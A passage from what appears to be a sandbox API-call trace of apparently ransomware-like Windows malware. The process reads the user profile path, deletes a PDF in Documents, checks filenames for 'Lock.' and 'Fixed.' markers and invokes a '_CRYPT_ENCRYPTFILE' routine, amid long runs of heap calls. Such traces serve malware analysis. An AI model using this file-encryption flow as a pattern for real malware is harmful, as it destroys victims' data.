hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0267.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.340] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0267.340] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0267.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0267.341] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/R8WIHAk.pdf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\R8WIHAk.pdf", lpFilePart=0x8cedf4*="R8WIHAk.pdf") returned 0x25 [0267.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.341] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\R8WIHAk.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\r8wihak.pdf")) returned 0x20 [0267.341] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\R8WIHAk.pdf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29f367b0, ftCreationTime.dwHighDateTime=0x1d5e2c5, ftLastAccessTime.dwLowDateTime=0x6beea0f0, ftLastAccessTime.dwHighDateTime=0x1d5e45d, ftLastWriteTime.dwLowDateTime=0x6beea0f0, ftLastWriteTime.dwHighDateTime=0x1d5e45d, nFileSizeHigh=0x0, nFileSizeLow=0x850b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="R8WIHAk.pdf", cAlternateFileName="")) returned 0xa873d0 [0267.341] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\R8WIHAk.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\r8wihak.pdf")) returned 1 [0267.347] FindNextFileW (in: hFindFile=0xa873d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29f367b0, ftCreationTime.dwHighDateTime=0x1d5e2c5, ftLastAccessTime.dwLowDateTime=0x6beea0f0, ftLastAccessTime.dwHighDateTime=0x1d5e45d, ftLastWriteTime.dwLowDateTime=0x6beea0f0, ftLastWriteTime.dwHighDateTime=0x1d5e45d, nFileSizeHigh=0x0, nFileSizeLow=0x850b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="R8WIHAk.pdf", cAlternateFileName="")) returned 0 [0267.347] FindClose (in: hFindFile=0xa873d0 | out: hFindFile=0xa873d0) returned 1 [0267.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.348] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.348] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.348] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/R8WIHAk.pdf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\R8WIHAk.pdf", lpFilePart=0x8cf650*="R8WIHAk.pdf") returned 0x25 [0267.348] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\R8WIHAk.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\r8wihak.pdf")) returned 0xffffffff [0267.349] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.349] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.349] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S7DDzGLO.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7DDzGLO.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DDzGLO.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DzGLO.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zGLO.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GLO.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LO.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.349] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S7DDzGLO.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7DDzGLO.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DDzGLO.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DzGLO.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zGLO.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GLO.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LO.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.350] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.350] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0267.350] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.351] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0267.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 